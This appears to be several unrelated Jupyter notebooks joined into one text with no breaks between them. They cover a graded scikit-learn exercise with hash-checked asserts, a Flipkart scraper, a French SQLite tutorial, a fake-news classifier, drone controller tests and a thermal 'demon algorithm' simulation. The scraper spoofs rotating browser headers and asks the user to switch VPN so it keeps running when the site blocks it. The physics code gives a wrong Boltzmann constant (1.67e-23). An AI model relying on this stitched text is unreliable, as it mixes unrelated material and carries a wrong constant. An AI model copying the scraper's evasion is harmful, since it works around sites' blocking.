df_processed["nb_words"] = ... # df_processed["doc_length"] = ... # df_processed["avg_word_length"] = ... # YOUR CODE HERE raise NotImplementedError() df_processed assert df_processed.shape == (5000, 6), "Something wrong about the shape, do you have all columns/rows?" assert "nb_words" in df_processed, "Missing column! Maybe wrong name?" assert "doc_length" in df_processed, "Missing column! Maybe wrong name?" assert "avg_word_length" in df_processed, "Missing column! Maybe wrong name?" hash_nb_words = "bbd0f5a5179c2e0433c3cfd2bf5809c4db8f3b7dfdf44a6729c79c9337ff2361" hash_doc_length = "3fa5e413714a16c6c9b463ff9883f366dd8fd8e4e46812bdb589365b4afbe54d" hash_avg_word_length = "9c11f12992d183e81f7c20ebc3e901fc4b2ef56ab01d2d2046f0603f70abb043" assert _hash(df_processed["nb_words"]) == hash_nb_words, "Something wrong with how you are calculating this column." assert _hash(df_processed["doc_length"]) == hash_doc_length, "Something wrong with how you are calculating this column." assert _hash(df_processed["avg_word_length"]) == hash_avg_word_length, "Something wrong with how you are calculating this column."Q3 b) Feature UnionLet's create a processing _Pipeline_ for every new feature and then join them all using a _Feature Union_. For the textual feature use the usual _TfidfVectorizer_ with default parameters and for any numerical feature use a _Standard Scaler_. Afterwards, join the features pipelines using a _Feature Union_.# text_pipe = Pipeline([...]) # nb_adj_adv_pipe = Pipeline([...]) # nb_words_pipe = Pipeline([...]) # doc_length_pipe = Pipeline([...]) # avg_word_length_pipe = Pipeline([...]) # feats = FeatureUnion(...) # YOUR CODE HERE raise NotImplementedError() assert isinstance(feats, FeatureUnion) assert len(feats.transformer_list) == 5, "Are you creating 5 pipelines? One for each feature?" for pipe in feats.transformer_list: selector = pipe[1][0] if not (isinstance(selector, TextSelector) or isinstance(selector, NumberSelector)): raise AssertionError("pipeline is wrong, the Selectors should come first.") feature_builder = pipe[1][1] if not (isinstance(feature_builder, TfidfVectorizer) or isinstance(feature_builder, StandardScaler)): raise AssertionError("pipeline is wrong, the second thing to come should be the Tfidf or the Scaler.")Now let's build our function to use our newly created _Feature Union_ and calculate its performance!def improved_pipeline(feats, X_train, X_test, y_train, y_test): """ Train a Random Forest using sklearn's Pipeline and return the trained model and its accuracy in the test set. Don't forget to add the feats to the Pipeline! """ # pipe = (...) # pipe.fit(...) # (...) # YOUR CODE HERE raise NotImplementedError() return pipe, acc Y = df_processed["label"] X = df_processed.drop(columns="label") X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=42, stratify=Y) pipeline_model, pipeline_acc = improved_pipeline(feats, X_train, X_test, y_train, y_test) # asserts assert isinstance(pipeline_model, Pipeline) assert _hash(pipeline_model[0]) == "f5e738d891cee945082226770873c560481fccce687af07ea966b30de065ac35", "The first part of the\ Pipeline is incorrect." assert _hash(pipeline_model[1]) == "7ab1fd7f03f247b36ba389a0a2eb8767ed2f1d2535f8e295669ac5ae2319d3c8", "The second part of the\ Pipeline is incorrect." assert np.allclose(pipeline_acc, 0.896, 0.03), "something wrong with the accuracy score. Use the default parameters."Step 1: Read Keyword List The keyword list should be in .txt format with each line containing a keyword.!ls ./../DATASET/KeywordLists keywords = open('./../DATASET/KeywordLists/top_100_keyword_list.txt', 'r') keyword_list = [] for k in keywords: k = k.strip("\n") keyword_list.append(k) print('Keyword List: ', keyword_list[:10]) print('Keyword Count: ', len(keyword_list)) headers = [ { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 OPR/68.0.3618.165', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Edg/83.0.478.37', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', } ] e = Extractor.from_yaml_file('./Extractor/Flipkart_keyword_search_product_list.yml') l = Extractor.from_yaml_file('./Extractor/Flipkart_nextpg.yml') p = Extractor.from_yaml_file('./Extractor/Flipkart_keyword_search_product_page.yml') MAX_TRIALS_A = 50 # Set the max number of trials to perform here. ERROR_COUNT_A = 1 def scrape_SearchResult(url): global ERROR_COUNT_A ''' This function downloads the webpage at the given url using requests module. Parameters: url (string): URL of webpage to scrape Returns: string: If the URL contains products, returns the html of the webpage as text, else returns 'False'. ''' # Download the page using requests print("Downloading %s"%url) trial = 0 while(True): # Ask to change vpn every 3 pages without results to ensure data is not missed because of being blocked if ERROR_COUNT_A % 3 == 0: _ = input('Please Change VPN and enter \'DONE\' to continue') ERROR_COUNT_A += 1 if trial == MAX_TRIALS_A: print("Max trials exceeded yet no Data found on this page!") ERROR_COUNT_A += 1 return 'False' # Get the html data from the url while True: try: trial = trial + 1 print("Trial no:", trial) r = requests.get(url, headers=random.choice(headers), timeout = 15) # We use product_list.yml extractor to extract the product details from the html data text data = e.extract(r.text) # print(data) if data['url_a'] is None: if data['url_b'] is None: print("Retrying with new user agent!") break else: return r.text else: return r.text except requests.exceptions.RequestException as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.HTTPError as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.ConnectionError as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.Timeout as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue MAX_TRIALS_B = 50 # Set the max number of trials to perform here. ERROR_COUNT_B = 1 def scrape_ProductPage(url): ''' This function downloads the webpage at the given url using requests module. Parameters: url (string): URL of webpage to scrape Returns: string: If the URL contains products, returns the html of the webpage as text, else returns 'False'. ''' global ERROR_COUNT_B # Download the page using requests print("Downloading %s"%url) trial = 0 while(True): # Ask to change vpn every 20 pages without results to ensure data is not missed because of being blocked if ERROR_COUNT_B % 20 == 0: _ = input('Please Change VPN and enter \'DONE\' to continue') ERROR_COUNT_B += 1 if trial == MAX_TRIALS_B: print("Max trials exceeded yet no Data found on this page!") ERROR_COUNT_B += 1 return 'False' trial = trial + 1 print("Trial no:", trial) # Get the html data from the url while True: try: r = requests.get(url, headers=random.choice(headers), timeout = 15) # We use product_list.yml extractor to extract the product details from the html data text data = p.extract(r.text) # If the products title in the scraped html is not empty, return extracted details as dict. # If the products title in the scraped html is empty, retry with new user agent. if data['Title'] != None: return (p.extract(r.text)) else: print("Retrying with new user agent!") break except requests.exceptions.RequestException as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.HTTPError as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.ConnectionError as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.Timeout as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue FileName = 'SCRAPED_KEYWORD_LIST_TOP_100_FLIPKART_BigSavingsDay_6thTo10thAUG' # FileName = 'SCRAPED_KEYWORD_LIST_APPARIO_GENERIC' #FileName = 'SCRAPED_KEYWORD_LIST_APPARIO' #FileName = 'SCRAPED_KEYWORD_LIST_CLOUDTAIL' outfile_path = str('./ScriptOutput/DATASET/' + str(FileName) + '.jsonl') # Keyword Type # Example: APPARIO GENERIC # Example: TOP 100 UK # Example: TOP 100 INDIA KeywordType = input("Enter Keyword Type") MIN_NUM_OF_PRODUCTS_TO_SCRAPE = 120 with open(outfile_path,'a') as outfile: for k in keyword_list: pg_number = 1 search_rank = 1 if k == 'EOF': break while True: if search_rank >= MIN_NUM_OF_PRODUCTS_TO_SCRAPE + 1: break # To account for differnt urls based on page number if pg_number == 1: url = str("https://www.flipkart.com/search?q="+str(k)) else: url = str("https://www.flipkart.com/search?q="+str(k)+"&page="+ str(pg_number)) data_text = scrape_SearchResult(url) if data_text == 'False': break else: # Extract all product details in a dict 'data' using the extractor file data = e.extract(data_text) if data['url_a'] is not None: urls = data['url_a'] if data['url_b'] is not None: urls = data['url_b'] # Save html text to file html_files_path = str('./ScriptOutput/HTML/'+ str(FileName) + '/' + str(k) +'/Page_'+str(pg_number)+'.html') os.makedirs(os.path.dirname(html_files_path), exist_ok=True) with open(html_files_path, 'w') as file: file.write(data_text) for product in urls: print('Product '+ str(search_rank%len(urls)) + ' of '+ str(len(urls)) + ' on this page!') # print(urls) product['SearchResultPosition'] = search_rank search_rank += 1 product['SearchKeyword'] = k product['SearchUrl'] = url date = datetime.datetime.now() product['Timestamp'] = date.strftime("%c") product['KeywordType'] = KeywordType if product['Label'] is not None: product['Label'] = 'Flipkart Assured' if 'www.flipkart.' in product['ProductPageUrl']: data = scrape_ProductPage(product['ProductPageUrl']) else: product['ProductPageUrl'] = 'https://www.flipkart.com'+ product['ProductPageUrl'] data = scrape_ProductPage(product['ProductPageUrl']) # print(data) if data == 'False': product['Title'] = None product['MRP'] = None product['FlipkartPrice'] = None product['DiscountPercentage'] = None product['Rating'] = None product['RatingCount'] = None product['ProductDescription'] = None product['Breadcrumbs'] = None product['FlipkartAssured'] = None print("Saving Product: %s"%product['Title']) print(product) json.dump(product,outfile) outfile.write("\n") continue product['Title'] = data['Title'] product['MRP'] = data['MRP'] product['FlipkartPrice'] = data['FlipkartPrice'] product['DiscountPercentage'] = data['DiscountPercentage'] product['Rating'] = data['Rating'] product['ProductDescription'] = data['ProductDescription'] product['RatingCount'] = data['RatingCount'] if data['FlipkartAssured'] is not None: product['FlipkartAssured'] = 'Flipkart Assured' else: product['FlipkartAssured'] = None product['Breadcrumbs'] = data['Breadcrumbs'] product['Seller'] = data['Seller'] print("Saving Product: %s"%product['Title']) print(product) json.dump(product,outfile) outfile.write("\n") pg_number += 1 # ProductPageUrl # Label # SearchResultPosition # SearchKeyword # SearchUrl # Timestamp # KeywordType # Title # FLipkartPrice # MRP # DiscountPercentage # Rating # ProductDescription # RatingCount # FlipkartAssured # Breadcrumbs # SellerIntroduction rapideVoici un premier exercice simple mais complet pour montrer comment :- créer une base de données SQLite- créer un tableau de données- insérer des données dans la table- interroger les données de la table%load_ext sqlCréation d'une base de données SQLiteIl est conseillé de créer votre propre base de données, de sorte que vous soyez libre d'effectuer toutes les opérations sur celle-ci. Si vous utilisez le shell SQLite, nous pouvons appliquer la commande *** open *** à la fois pour créer une base de données SQLite ou pour l'ouvrir au cas où elle existe déjà, comme:> sqlite> .open testdbDe même, nous pouvons utiliser ipython-sql pour la même chose:%sql sqlite:////content/writers.db3Création d'une table***%%sql*** permet d'effectuer plusieurs instructions SQL dans une seule cellule du notebook.Nous allons créer la table à l'aide d'une commande SQL standard : **CREATE TABLE**Si la table existe déjà dans la base de données, une erreur sera retournée. De plus, nous avons défini ***PRIMARY KEY*** sur le champ USERID pour éviter d'insérer des auteurs en double dans la table.%%sql sqlite:// CREATE TABLE writer( FirstName VARCHAR(50) NOT NULL, LastName VARCHAR(50) NOT NULL, USERID int NOT NULL UNIQUE, PRIMARY KEY (USERID) );Done.Ajout de données dans la tableLa table que nous venons de créer est vide. Nous allons donc insérer des données à l'intérieur. Pour renseigner ces données sous forme de lignes, nous utiliserons la commande **INSERT**%%sql sqlite:// INSERT INTO writer VALUES ('William', 'Shakespeare', 1616); INSERT INTO writer VALUES ('Lin', 'Han', 1996); INSERT INTO writer VALUES ('Peter', 'Brecht', 1978);1 rows affected. 1 rows affected. 1 rows affected.Exécution de notre 1ère requêteNous allons écrire une requête simple pour vérifier les résultats des opérations précédentes dans lesquelles nous avons créé une table et y avons inséré trois lignes de données. Pour cela, nous utiliserons la commande appelée **SELECT**nous pouvons mettre le résultat de la requête dans une variable nommée **sqlres** dans l'exemple suivant :sqlres = %sql SELECT * from writer sqlres* sqlite:////content/writers.db3 Done.Vous pouvez également sélectionner des colonnes spécifiques, en spécifiant leurs noms :sqlres = %sql SELECT FirstName, LastName from writer sqlres* sqlite:////content/writers.db3 Done.Clssifier Model for True and Fake news# The dataset "https://www.kaggle.com/clmentbisaillon/fake-and-real-news-dataset"Import Necessary packagesimport numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import nltk import re import string import os #@title mount Google drive from google.colab import drive drive.mount('/content/drive') #@title Path to the datasets real_data = pd.read_csv('/content/drive/My Drive/AP Hack/datasets/True.csv') fake_data = pd.read_csv('/content/drive/My Drive/AP Hack/datasets/Fake.csv')Basic EDAreal_data.head() fake_data.head() real_data.info() fake_data.info() real_data['target'] = 1 fake_data['target'] = 0 fake_data.tail() combine_data = pd.concat([real_data, fake_data], ignore_index=True, sort=False) combine_data.tail() plt.figure(figsize=(7, 7)) sns.set(style="darkgrid") color = sns.color_palette("Set2") ax = sns.countplot(x="target", data=combine_data, palette=color) ax.set(xticklabels=['fake', 'real']) plt.title("Data distribution of fake and real data") combine_data.isnull().sum()Data Cleaningimport re def clean_train_data(x): text = x text = text.lower() text = re.sub('\[.*?\]', '', text) # remove square brackets text = re.sub(r'[^\w\s]','',text) # remove punctuation text = re.sub('\w*\d\w*', '', text) # remove words containing numbers text = re.sub(r'http\S+', '', text) text = re.sub('\n', '', text) return text clean_combine_data = combine_data.copy() clean_combine_data['text'] = combine_data.text.apply(lambda x : clean_train_data(x)) clean_combine_data.head() clean_combine_data.tail()StopWord Removalnltk.download('stopwords') nltk.download('punkt') eng_stopwords = nltk.corpus.stopwords.words("english") def remove_eng_stopwords(text): token_text = nltk.word_tokenize(text) remove_stop = [word for word in token_text if word not in eng_stopwords] join_text = ' '.join(remove_stop) return join_text stopword_combine_data = clean_combine_data.copy() stopword_combine_data['text'] = clean_combine_data.text.apply(lambda x : remove_eng_stopwords(x)) stopword_combine_data.head()Modelingmodel_data = stopword_combine_data.copy() model_data['combine_text'] = model_data['subject'] + " " + model_data['title'] + " " + model_data['text'] del model_data['title'] del model_data['subject'] del model_data['date'] del model_data['text'] model_data.head() from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(model_data['combine_text'], model_data['target'], random_state=0)Vectorizingfrom sklearn.feature_extraction.text import CountVectorizer vec_train = CountVectorizer().fit(X_train) X_vec_train = vec_train.transform(X_train) X_vec_test = vec_train.transform(X_test) from sklearn.linear_model import LogisticRegression from sklearn.metrics import roc_auc_score model = LogisticRegression() model.fit(X_vec_train, y_train) predicted_value = model.predict(X_vec_test) accuracy_value = roc_auc_score(y_test, predicted_value) print(accuracy_value)0.9985562606683752Comparison of linear and non-linear controllers This notebook is a pretty straightforward comparison of a linear controller against a non-linear controller.Read through the code and run it as is! Then feel free to modify some of the parameters and play around with different trajectories.%matplotlib inline %config InlineBackend.figure_format = 'retina' %load_ext autoreload %autoreload 2 import numpy as np import math from math import sin, cos import matplotlib.pyplot as plt import matplotlib.pylab as pylab from drone import Drone2D import trajectories import simulate import plotting from controllers import LinearCascadingController, NonLinearCascadingController pylab.rcParams['figure.figsize'] = 10, 10 SPEED_UP = 5 total_time = 100.0 omega_z = 2.0 drone = Drone2D() z_k_p = 3.1 z_k_d = 10.0 y_k_p = 2.3 y_k_d = 10.0 phi_k_p = 50.0 phi_k_d = 50.0 # INSTANTIATE CONTROLLERS linear_controller = LinearCascadingController( drone.m, drone.I_x, z_k_p=z_k_p, z_k_d=z_k_d, y_k_p=y_k_p, y_k_d=y_k_d, phi_k_p=phi_k_p, phi_k_d=phi_k_d ) non_linear_controller = NonLinearCascadingController( drone.m, drone.I_x, z_k_p=z_k_p, z_k_d=z_k_d, y_k_p=y_k_p, y_k_d=y_k_d, phi_k_p=phi_k_p, phi_k_d=phi_k_d ) # GENERATE FIGURE 8 z_traj, y_traj, t = trajectories.figure_8(omega_z, total_time, dt=0.02) dt = t[1] - t[0] # SIMULATE MOTION linear_history = simulate.zy_flight(z_traj, y_traj, t, linear_controller, inner_loop_speed_up=SPEED_UP) non_linear_history = simulate.zy_flight(z_traj, y_traj, t, non_linear_controller, inner_loop_speed_up=SPEED_UP) # PLOT RESULTS pylab.rcParams['figure.figsize'] = 10, 10 plotting.compare_flight_paths(z_traj[0], y_traj[0], linear_history, non_linear_history, "Linear Controller", "Non-Linear Controller") # Error calculation z_path = z_traj[0] y_path = y_traj[0] non_linear_Err= np.sqrt((non_linear_history[:,1] - y_path[:])**2 \ +(non_linear_history[:,0] - z_path[:])**2) linear_Err= np.sqrt((linear_history[:,1] - y_path[:])**2 \ + (linear_history[:,0] - z_path[:])**2) t1=np.linspace(0.0,total_time,int(total_time*SPEED_UP/dt)) plt.plot(t,non_linear_Err,color='red',marker='.') plt.plot(t,linear_Err,color='blue') plt.xlabel('$t$ [$s$]').set_fontsize(20) plt.ylabel('$\epsilon$ [$m$]').set_fontsize(20) plt.xticks(fontsize = 14) plt.yticks(fontsize = 14) plt.legend(['non_linear','linear'],fontsize = 14) plt.show()The Demon Algorithm===========There are a number of approaches to complex problems involving large numbers of interactions where the objective is to find the "average" behavior of the system over a long period of time. We've seen that we can integrage Newton's 2nd Law to see the precise behavior of a multipartical system over time. When we have a handful of objects in a system this works well. However, if we have thousands or millions of particles, it's not practical. Looking at "average" behavior however glosses over the precision of following each interaction and attempts only to see what happens on a less fine-grained scale. This means we sacrifice the hope of getting a detailed pictured of a microscopic physical process, but achieve the reward of a more general understanding of the large scale consequences of that process. The demon algorithm is such an approach. It's a simple way to simulate the random exchange of energy between components of a system over time. Here's the basic idea:* Suppose we have a demon.. 1 Make a small change to the system. 2 Compute $\Delta E$. If $\Delta E<0$ give it to the “demon” and accept the change. 3 If $\Delta E>0$ and the demon has that much energy available, accept the change and take the energy from the demon. 4 If the demon doesn’t have that much energy, then reject the change. Example Problem---------------Compute the height distribution of nitrogen molecules near the Earth's surface. Assume T=const. and that the weight of a molecule is constant.$$ PE(y) = m g y $$so $\Delta E$ is just $m g \Delta y$.Below is a sample program that uses the demon algorithm to approach this problem.%pylab inline # # rand() returns a single random number: # print(rand()) # # hist plots a histogram of an array of numbers # print(hist(normal(size=1000))) m=28*1.67e-27 # mass of a molecule (e.g., Nitrogen) g=9.8 # grav field strength kb=1.67e-23 # boltzman constant demonE = 0.0 # initial demon energy N=10000 # number of molecules M=400000 # number of iterations h=20000.0 # height scale def setup(N=100,L=1.0): y=L*rand(N) # put N particles at random heights (y) between 0 and L return y yarray = setup(N=1000,L=2.0) hist(yarray) def shake(y, demonE, delta=0.1): """ Pass in the current demon energy as an argument. delta is the size of change in y to generate, more or less. randomly choose a particle, change it's position slightly (around delta) return the new demon energy and a boolean (was the change accepted?) """ ix = int(rand()*len(y)) deltaY = delta*normal() deltaE = deltaY*m*g accept=False if deltaE < demonE and (y[ix]+deltaY>0): demonE -= deltaE # take the energy from the demon, or give it if deltaE<0. y[ix] += deltaY accept=True return demonE, accept y = setup(N,L=h) acceptCount = 0 demonList = [] for i in range(M): demonE,accept = shake(y, demonE, delta=0.2*h) demonList.append(demonE) if accept: acceptCount += 1 title("Distribution of heights") xlabel("height (m)") ylabel("number in height range") hist(y,bins=40) print(100.0*acceptCount/M, "percent accepted") print("Averge height=%4.3fm" % (y.sum()/len(y),)) # # Build a histogram of Demon Energies # title("Distribution of Demon Energies") xlabel("Energy Ranges (J)") ylabel("Number in Energy Ranges") ns, bins, patches = hist(demonList, bins=60)Demonic Thermometer====================You can easily see that the demon acts like an small thermometer. According to the Maxwell-Boltzmann distribution the energy distribution of the demon's energy should go like:$$P(E) = P_0 e^{-E/k_B T}$$Where $P_0$ is the basically the probability of having an energy of zero. (Actually, maybe a better way to think of it is as a normalization constant that's determined by the requirement that the total probability to have *any* energy is 1.0). The histogram of demon energies tells us the number of times the demon have various values of energy during the calculation. This is proportional to the probability that the demon had various energies. We can fit that probability to an exponential curve (or the log of the probability to a straight line) and from the slope of the line deduce the temperature!See below how the code does exactly this.# # Use a "curve fit" to find the temperature of the demon # from scipy.optimize import curve_fit def fLinear(x, m, b): return m*x + b energies = (bins[:-1]+bins[1:])/2.0 xvals = array(energies) # fit log(n) vs. energy yvals = log(array(ns)) sig = 1.0/sqrt(array(ns)) # # make initial estimates of slope and intercept. # m0 = (yvals[-1]-yvals[0])/(xvals[-1]-xvals[0]) b0 = yvals[0]-m0*xvals[0] popt, pcov = curve_fit(fLinear, xvals, yvals, p0=(m0, b0), sigma=sig) m=popt[0] # slope dm=sqrt(pcov[0,0]) # sqrt(variance(slope)) b=popt[1] # int db=sqrt(pcov[1,1]) # sqrt(variance(int)) Temp=-1.0/(m*kb) # temperature dT = abs(dm*Temp/m)# approx uncertainty in temp print("slope=", m, "+/-", dm ) print("intercept=", b, "+/-", db) print("Temperature=", Temp, "+/-", dT, "K") title("Demon Energy Distribution") xlabel("Energy (J)") ylabel("log(n) (number of demon visit to energy)") errorbar(xvals, yvals, sig, fmt='r.') plot(xvals,yvals,'b.',label="Demon Energies") plot(xvals,fLinear(xvals, m, b),'r-', label="Fit") legend()slope= -1.90714037137e+20 +/- 6.16514763062e+17 